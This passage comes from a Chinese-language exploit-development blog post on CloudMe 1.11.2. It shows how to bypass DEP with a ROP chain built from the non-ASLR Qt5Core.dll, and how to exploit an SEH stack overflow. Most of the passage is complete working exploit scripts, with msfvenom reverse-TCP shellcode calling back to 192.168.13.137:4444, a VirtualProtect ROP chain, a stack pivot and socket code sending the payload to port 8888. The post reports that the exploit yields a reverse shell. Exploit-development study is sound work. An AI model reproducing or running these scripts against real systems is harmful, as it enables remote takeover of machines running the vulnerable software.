[Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0x68b226c5</span>, <span class="comment"># POP EAX # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0x690398a8</span>, <span class="comment"># ptr to &VirtualProtect() [IAT Qt5Core.dll]</span></span><br><span class="line"> <span class="comment">#[---INFO:pushad:---]</span></span><br><span class="line"> <span class="number">0x68fd02fb</span>, <span class="comment"># PUSHAD # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="comment">#[---INFO:extras:---]</span></span><br><span class="line"> <span class="number">0x68aa11e6</span>, <span class="comment"># ptr to 'push esp # ret ' [Qt5Core.dll]</span></span><br><span class="line"> ]</span><br><span class="line"> <span class="keyword">return</span> <span class="string">b''</span>.join(struct.pack(<span class="string">'<I'</span>, _) <span class="keyword">for</span> _ <span class="keyword">in</span> rop_gadgets)</span><br><span class="line"></span><br><span class="line">rop_chain = create_rop_chain()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">buff_size = <span class="number">4000</span></span><br><span class="line">junk = <span class="string">b'A'</span>*<span class="number">1052</span></span><br><span class="line">retn = struct.pack(<span class="string">"<L"</span>,<span class="number">0x68c1f01c</span>) <span class="comment"># 0x68c1f01c : retn</span></span><br><span class="line">nops = <span class="string">b"\x90"</span>*<span class="number">32</span></span><br><span class="line">junk2 = <span class="string">b'C'</span>*(buff_size<span class="number">-1052</span>-len(shellcode)<span class="number">-32</span>)</span><br><span class="line">payload = junk+retn+rop_chain+nops+shellcode+junk2</span><br><span class="line"></span><br><span class="line"><span class="keyword">try</span>:</span><br><span class="line"> 
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)</span><br><span class="line"> s.connect((target,<span class="number">8888</span>))</span><br><span class="line"> s.send(payload)</span><br><span class="line"><span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line"> print(e)</span><br></pre></td></tr></table></figure>
<p>这里的<code>ROP Chain</code>由<code>mona</code>自动生成,所使用的<code>Qt5Core.dll</code>没有开启<code>ASLR</code>,所以这里采用的办法是选择未开启<code>ASLR</code>的<code>DLL</code>来<code>bypass ASLR</code>。</p>
<p>成功反弹<code>shell</code>:</p>
<p><img src="/2022/05/08/CloudMe-v1-11-2-DEP-bypass-using-ROP-gadgets/01.png" alt="seh"></p>
<p><strong>SEH栈溢出利用:</strong></p>
<p>触发<code>SEH</code>栈溢出的<code>Offset</code>为<code>2348</code>,注意这里是指覆盖<code>Next SEH</code>的偏移而不是<code>SEH Handler</code>的偏移。按照普通<code>SEH</code>栈溢出漏洞的利用方式,<code>P/P/R</code>配合<code>JMP</code>,来看一下出现的问题:</p>
<p>在<code>P/P/R</code>处下断点,异常发生之后,进入<code>P/P/R</code>:</p>
<p><img src="/2022/05/08/CloudMe-v1-11-2-DEP-bypass-using-ROP-gadgets/04.png" alt="seh"></p>
<p>接下来想要执行<code>JMP</code>指令,但由于<code>DEP</code>的存在,位于栈上的指令无法执行,执行失败:</p>
<p><img src="/2022/05/08/CloudMe-v1-11-2-DEP-bypass-using-ROP-gadgets/05.png" alt="seh"></p>
<p>结合前一篇文章的介绍,这里需要用一条能够跳转到<code>ROP Chain</code>的指令来覆盖<code>SEH Handler</code>;前一篇文章介绍得比较详细,这里直接给出最后的利用脚本:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span 
class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> socket</span><br><span class="line"><span class="keyword">import</span> struct</span><br><span class="line"></span><br><span 
class="line">target=<span class="string">"127.0.0.1"</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># msfvenom -p windows/shell_reverse_tcp LHOST=192.168.13.137 LPORT=4444 EXITFUNC=thread -f python -v shellcode -b '\x00'</span></span><br><span class="line"></span><br><span class="line">shellcode = <span class="string">b""</span></span><br><span class="line">shellcode += <span class="string">b"\xda\xd9\xd9\x74\x24\xf4\xba\xc2\x93\x9a\x62"</span></span><br><span class="line">shellcode += <span class="string">b"\x58\x33\xc9\xb1\x52\x83\xe8\xfc\x31\x50\x13"</span></span><br><span class="line">shellcode += <span class="string">b"\x03\x92\x80\x78\x97\xee\x4f\xfe\x58\x0e\x90"</span></span><br><span class="line">shellcode += <span class="string">b"\x9f\xd1\xeb\xa1\x9f\x86\x78\x91\x2f\xcc\x2c"</span></span><br><span class="line">shellcode += <span class="string">b"\x1e\xdb\x80\xc4\x95\xa9\x0c\xeb\x1e\x07\x6b"</span></span><br><span class="line">shellcode += <span class="string">b"\xc2\x9f\x34\x4f\x45\x1c\x47\x9c\xa5\x1d\x88"</span></span><br><span class="line">shellcode += <span class="string">b"\xd1\xa4\x5a\xf5\x18\xf4\x33\x71\x8e\xe8\x30"</span></span><br><span class="line">shellcode += <span class="string">b"\xcf\x13\x83\x0b\xc1\x13\x70\xdb\xe0\x32\x27"</span></span><br><span class="line">shellcode += <span class="string">b"\x57\xbb\x94\xc6\xb4\xb7\x9c\xd0\xd9\xf2\x57"</span></span><br><span class="line">shellcode += <span class="string">b"\x6b\x29\x88\x69\xbd\x63\x71\xc5\x80\x4b\x80"</span></span><br><span class="line">shellcode += <span class="string">b"\x17\xc5\x6c\x7b\x62\x3f\x8f\x06\x75\x84\xed"</span></span><br><span class="line">shellcode += <span class="string">b"\xdc\xf0\x1e\x55\x96\xa3\xfa\x67\x7b\x35\x89"</span></span><br><span class="line">shellcode += <span class="string">b"\x64\x30\x31\xd5\x68\xc7\x96\x6e\x94\x4c\x19"</span></span><br><span class="line">shellcode += <span 
class="string">b"\xa0\x1c\x16\x3e\x64\x44\xcc\x5f\x3d\x20\xa3"</span></span><br><span class="line">shellcode += <span class="string">b"\x60\x5d\x8b\x1c\xc5\x16\x26\x48\x74\x75\x2f"</span></span><br><span class="line">shellcode += <span class="string">b"\xbd\xb5\x85\xaf\xa9\xce\xf6\x9d\x76\x65\x90"</span></span><br><span class="line">shellcode += <span class="string">b"\xad\xff\xa3\x67\xd1\xd5\x14\xf7\x2c\xd6\x64"</span></span><br><span class="line">shellcode += <span class="string">b"\xde\xea\x82\x34\x48\xda\xaa\xde\x88\xe3\x7e"</span></span><br><span class="line">shellcode += <span class="string">b"\x70\xd8\x4b\xd1\x31\x88\x2b\x81\xd9\xc2\xa3"</span></span><br><span class="line">shellcode += <span class="string">b"\xfe\xfa\xed\x69\x97\x91\x14\xfa\x58\xcd\x1b"</span></span><br><span class="line">shellcode += <span class="string">b"\x73\x30\x0c\x23\x92\x9d\x99\xc5\xfe\x0d\xcc"</span></span><br><span class="line">shellcode += <span class="string">b"\x5e\x97\xb4\x55\x14\x06\x38\x40\x51\x08\xb2"</span></span><br><span class="line">shellcode += <span class="string">b"\x67\xa6\xc7\x33\x0d\xb4\xb0\xb3\x58\xe6\x17"</span></span><br><span class="line">shellcode += <span class="string">b"\xcb\x76\x8e\xf4\x5e\x1d\x4e\x72\x43\x8a\x19"</span></span><br><span class="line">shellcode += <span class="string">b"\xd3\xb5\xc3\xcf\xc9\xec\x7d\xed\x13\x68\x45"</span></span><br><span class="line">shellcode += <span class="string">b"\xb5\xcf\x49\x48\x34\x9d\xf6\x6e\x26\x5b\xf6"</span></span><br><span class="line">shellcode += <span class="string">b"\x2a\x12\x33\xa1\xe4\xcc\xf5\x1b\x47\xa6\xaf"</span></span><br><span class="line">shellcode += <span class="string">b"\xf0\x01\x2e\x29\x3b\x92\x28\x36\x16\x64\xd4"</span></span><br><span class="line">shellcode += <span class="string">b"\x87\xcf\x31\xeb\x28\x98\xb5\x94\x54\x38\x39"</span></span><br><span class="line">shellcode += <span class="string">b"\x4f\xdd\x58\xd8\x45\x28\xf1\x45\x0c\x91\x9c"</span></span><br><span class="line">shellcode += 
<span class="string">b"\x75\xfb\xd6\x98\xf5\x09\xa7\x5e\xe5\x78\xa2"</span></span><br><span class="line">shellcode += <span class="string">b"\x1b\xa1\x91\xde\x34\x44\x95\x4d\x34\x4d"</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">create_rop_chain</span><span class="params">()</span>:</span></span><br><span class="line"></span><br><span class="line"> <span class="comment"># rop chain generated with mona.py - www.corelan.be</span></span><br><span class="line"> rop_gadgets = [</span><br><span class="line"> <span class="comment">#[---INFO:gadgets_to_set_ebp:---]</span></span><br><span class="line"> <span class="number">0x68c50d64</span>, <span class="comment"># POP EBP # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0x41414141</span>, <span class="comment"># junk</span></span><br><span class="line"> <span class="number">0x68c50d64</span>, <span class="comment"># skip 4 bytes [Qt5Core.dll]</span></span><br><span class="line"> <span class="comment">#[---INFO:gadgets_to_set_ebx:---]</span></span><br><span class="line"> <span class="number">0x68fa7ca2</span>, <span class="comment"># POP EDX # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0xfffffdff</span>, <span class="comment"># Value to negate, will become 0x00000201</span></span><br><span class="line"> <span class="number">0x68bd5fe4</span>, <span class="comment"># NEG EDX # RETN 0x0C [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0x68d773fe</span>, <span class="comment"># POP EBX # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0x41414141</span>, <span class="comment"># Filler (RETN offset compensation)</span></span><br><span class="line"> <span class="number">0x41414141</span>, <span 
class="comment"># Filler (RETN offset compensation)</span></span><br><span class="line"> <span class="number">0x41414141</span>, <span class="comment"># Filler (RETN offset compensation)</span></span><br><span class="line"> <span class="number">0xffffffff</span>, <span class="comment">#</span></span><br><span class="line"> <span class="number">0x68fb3ef1</span>, <span class="comment"># INC EBX # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0x68f8063c</span>, <span class="comment"># ADD EBX,EDX # ADD AL,0A # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="comment">#[---INFO:gadgets_to_set_edx:---]</span></span><br><span class="line"> <span class="number">0x68f9a472</span>, <span class="comment"># POP EDX # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0xffffffc0</span>, <span class="comment"># Value to negate, will become 0x00000040</span></span><br><span class="line"> <span class="number">0x68bd5fe4</span>, <span class="comment"># NEG EDX # RETN 0x0C [Qt5Core.dll]</span></span><br><span class="line"> <span class="comment">#[---INFO:gadgets_to_set_ecx:---]</span></span><br><span class="line"> <span class="number">0x68ae7e17</span>, <span class="comment"># POP ECX # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0x41414141</span>, <span class="comment"># Filler (RETN offset compensation)</span></span><br><span class="line"> <span class="number">0x41414141</span>, <span class="comment"># Filler (RETN offset compensation)</span></span><br><span class="line"> <span class="number">0x41414141</span>, <span class="comment"># Filler (RETN offset compensation)</span></span><br><span class="line"> <span class="number">0x68c13baa</span>, <span class="comment"># &Writable location [Qt5Core.dll]</span></span><br><span class="line"> <span class="comment">#[---INFO:gadgets_to_set_edi:---]</span></span><br><span class="line"> <span class="number">0x68c018b6</span>, 
<span class="comment"># POP EDI # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0x68cef5b4</span>, <span class="comment"># RETN (ROP NOP) [Qt5Core.dll]</span></span><br><span class="line"> <span class="comment">#[---INFO:gadgets_to_set_esi:---]</span></span><br><span class="line"> <span class="number">0x68d54786</span>, <span class="comment"># POP ESI # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0x68a9314e</span>, <span class="comment"># JMP [EAX] [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0x68b226c5</span>, <span class="comment"># POP EAX # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="number">0x690398a8</span>, <span class="comment"># ptr to &VirtualProtect() [IAT Qt5Core.dll]</span></span><br><span class="line"> <span class="comment">#[---INFO:pushad:---]</span></span><br><span class="line"> <span class="number">0x68fd02fb</span>, <span class="comment"># PUSHAD # RETN [Qt5Core.dll]</span></span><br><span class="line"> <span class="comment">#[---INFO:extras:---]</span></span><br><span class="line"> <span class="number">0x68aa11e6</span>, <span class="comment"># ptr to 'push esp # ret ' [Qt5Core.dll]</span></span><br><span class="line"> ]</span><br><span class="line"> <span class="keyword">return</span> <span class="string">b''</span>.join(struct.pack(<span class="string">'<I'</span>, _) <span class="keyword">for</span> _ <span class="keyword">in</span> rop_gadgets)</span><br><span class="line"></span><br><span class="line">rop_chain = create_rop_chain()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">buff_size = <span class="number">4000</span></span><br><span class="line"><span class="comment">#junk = b'A'*2348</span></span><br><span class="line"><span class="comment">#nseh = b"\xeb\x06\x90\x90"</span></span><br><span class="line">junk = <span class="string">b'A'</span>*<span 
class="number">2352</span></span><br><span class="line"><span class="comment">#seh = struct.pack("<L",0x68a9528e) #0x68a9528e : pop esi # pop edi # ret</span></span><br><span class="line">seh = struct.pack(<span class="string">"<L"</span>,<span class="number">0x68b72608</span>) <span class="comment">#0x68b72608 : {pivot 4156 / 0x103c} : # ADD ESP,102C # POP EBX # POP ESI # POP EDI # POP EBP # RETN 0x04</span></span><br><span class="line">nops = <span class="string">b"\x90"</span>*<span class="number">32</span></span><br><span class="line">nops2 = <span class="string">b"\x90"</span>*<span class="number">1480</span></span><br><span class="line">junk1 = <span class="string">b"\x41"</span>*<span class="number">16</span> </span><br><span class="line">junk2 = <span class="string">b'C'</span>*(buff_size<span class="number">-2352</span><span class="number">-4</span>-len(shellcode)-len(nops)-len(nops2))</span><br><span class="line"><span class="comment">#payload = junk+nseh+seh+retn+rop_chain+nops+shellcode+junk2</span></span><br><span class="line">payload = junk+seh+nops2+junk1+rop_chain+nops+shellcode+junk2</span><br><span class="line"></span><br><span class="line"><span class="keyword">try</span>:</span><br><span class="line"> s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)</span><br><span class="line"> s.connect((target,<span class="number">8888</span>))</span><br><span class="line"> s.send(payload)</span><br><span class="line"><span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line"> print(e)</span><br></pre></td></tr></table></figure>
<p>成功反弹 <code>shell</code>：</p>
<p><img src="/2022/05/08/CloudMe-v1-11-2-DEP-bypass-using-ROP-gadgets/01.png" alt="成功反弹 shell"></p>
<p><strong>参考:</strong></p>
<p>1.<a href="https://xen0vas.github.io/cloudme-v1-11-2-dep-bypass-using-rop-gadgets/#" target="_blank" rel="noopener">https://xen0vas.github.io/cloudme-v1-11-2-dep-bypass-using-rop-gadgets/#</a></p>
</div>
<footer class="post-footer">
<div class="post-eof"></div>
</footer>
</article>